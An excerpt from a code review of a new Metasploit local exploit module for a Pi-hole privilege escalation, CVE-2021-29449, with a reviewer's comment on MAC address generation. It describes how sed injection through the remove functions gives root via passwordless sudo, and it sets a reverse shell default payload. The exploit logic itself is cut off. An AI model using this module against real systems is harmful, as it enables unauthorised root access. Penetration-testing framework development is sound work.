modules/exploits/linux/local/pihole_remove_commands_lpe.rb

```diff
@@ -0,0 +1,167 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  # includes: is_root?
+  include Msf::Post::Linux::Priv
+  # includes writable?, upload_file, upload_and_chmodx, exploit_data
+  include Msf::Post::File
+  # for whoami
+  include Msf::Post::Unix
+  # for get_session_pid needed by whoami
+  include Msf::Post::Linux::System
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Pi-Hole Remove Commands Linux Priv Esc',
+        'Description' => %q{
+          Pi-Hole versions 3.0 - 5.3 allows for command line input to the removecustomcname,
+          removecustomdns, and removestaticdhcp functions without properly validating
+          the parameters before passing to sed.  When executed as the www-data user,
+          this alows for a privilege escalation to root since www-data is in the
+          sudoers.d/pihole file with no password.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'Emanuele Barbeno <emanuele.barbeno@compass-security.com>' # original PoC, analysis
+          ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => [ ARCH_CMD ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_php_ssl' },
+        'Payload' =>
+          {
+            'BadChars' => "\x27" # '
+          },
+        'Privileged' => true,
+        'References' =>
+          [
+            [ 'URL', 'https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj' ],
+            [ 'URL', 'https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt' ],
+            [ 'CVE', '2021-29449' ]
+          ],
+        'DisclosureDate' => '2021-04-20',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+        },
+        'Targets' => [
+          ['DHCP', { 'min' => Rex::Version.new('3.0') }], # exploitable by default, expecially when combined with unix/http/pihole_dhcp_mac_exec
+          ['DNS', { 'min' => Rex::Version.new('5.0') }],
+          ['CNAME', { 'min' => Rex::Version.new('5.1') }],
+        ],
+        'DefaultTarget' => 0
+      )
+    )
+  end
+
+  def sudo_pihole
+    'sudo /usr/local/bin/pihole -a'
+  end
+
+  def fake_mac
+    # https://gist.github.com/jiggneshhgohel/d4d5996207dcf81bef8e#gistcomment-1736142
+    # 6.times.map { '%02x' % rand(0..255) }.join(':') # not rubocop complaint
+    6.times.map { format('%02x', rand(0..255)) }.join(':')
+  end
```

Comment:
How about replacing this with the implementation from Faker [`Faker::Internet.mac_address`](https://github.com/faker-ruby/faker/blob/master/doc/default/internet.md).